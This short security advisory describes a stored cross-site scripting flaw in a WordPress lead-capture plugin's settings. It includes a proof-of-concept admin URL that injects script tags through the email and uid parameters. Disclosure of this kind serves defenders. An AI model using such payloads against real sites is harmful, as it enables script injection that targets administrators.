The plugin does not sanitize and escape the email and uid parameters in the plugin settings, which could allow users with roles as low as contributor to inject arbitrary web scripts into the settings, targeting higher-privileged users such as administrators.
https://example.com/wp-admin/admin.php?page=lead-capturing-call-to-actions-by-vcita/vcita-callback.php&success=true&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script>&uid=a”</script><script>alert(2);</script>